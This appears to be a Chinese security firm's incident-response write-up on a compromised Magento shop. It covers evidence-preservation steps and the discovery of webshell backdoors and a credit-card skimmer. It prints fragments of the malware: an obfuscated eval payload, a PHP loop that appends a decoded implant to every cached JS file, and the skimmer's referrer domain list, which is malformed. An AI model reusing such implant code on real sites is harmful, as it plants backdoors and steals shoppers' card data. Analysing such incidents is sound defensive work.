排查黑客攻擊的問(wèn)題時(shí)，很容易陷入只分析日志等細(xì)節(jié)的誤區(qū)。其實(shí)，在進(jìn)行任何分析之前，我們都需要先做以下幾件事情：

第一，核實(shí)信息。這就像是我們?cè)谡义e(cuò)問(wèn)題之前，需要先了解出現(xiàn)問(wèn)題的具體細(xì)節(jié)和當(dāng)前服務(wù)器的環(huán)境情況。

第二，斷開(kāi)服務(wù)器的外網(wǎng)鏈接，保障安全。這就像是把自家的大門關(guān)上，不讓壞人輕松進(jìn)入。

第三，保存服務(wù)器的環(huán)境，以及現(xiàn)場(chǎng)的各種信息，如端口網(wǎng)絡(luò)、應(yīng)用程序、日志文件等。這樣，就像是在證據(jù)鏈中留下關(guān)鍵的線索，更有利于我們查找和分析問(wèn)題，而且要注意不要有寫操作哦！

在現(xiàn)場(chǎng)環(huán)境中，雖然我們可能無(wú)法找到確切的問(wèn)題所在，但是可以通過(guò)查看歷史日志，來(lái)檢查是否存在服務(wù)器linux系統(tǒng)被提權(quán)等可疑行為。如果使用了chkrootkit、rkthunter和lynis等安全掃描工具，也未發(fā)現(xiàn)任何問(wèn)題，那還是建議客戶考慮更換服務(wù)器，以避免潛在的安全風(fēng)險(xiǎn)。

我們SINE安全首先從web層面去看，分析了網(wǎng)站訪問(wèn)日志，nginx日志，數(shù)據(jù)庫(kù)日志發(fā)現(xiàn)有許多黑客攻擊的痕跡，利用的都是Magento的一些高危漏洞進(jìn)行的，也可以說(shuō)明網(wǎng)站被入侵是由于magento低版本存在漏洞導(dǎo)致，我們立即展開(kāi)對(duì)系統(tǒng)以及源代碼的安全審計(jì)，人工去分析每一行代碼，通過(guò)我們的檢測(cè)，發(fā)現(xiàn)4個(gè)木馬后門，如下：

 

bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>

 

foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {

if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {

file_put_contents($filename, _decode($implant), FILE_APPEND);

echo "updated: {$filename}\n";

} else {

echo "ok: {$filename}\n";

}

}

通過(guò)上面的代碼我們可以發(fā)現(xiàn)都是一些webshell木馬后門，像filemanPHP大馬，一句話木馬，以及定時(shí)篡改網(wǎng)站全部JS功能的代碼，通過(guò)分析，我們SINE安全發(fā)現(xiàn)黑客入侵的目的不是為了掛馬和掛黑鏈，而是為了盜取用戶的信用卡信息，用于盜刷。我們對(duì)黑客植入到JS的代碼進(jìn)行了分析與解密，發(fā)現(xiàn)該JS代碼是用來(lái)記錄用戶的信用卡信息，針對(duì)Magento支付相關(guān)頁(yè)面（onepage|checkout|onestep|payment|transaction）中所有的表單信息，也會(huì)判斷來(lái)路是從

const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用戶，會(huì)將信用卡的信息POST發(fā)送到黑客的指定網(wǎng)站上。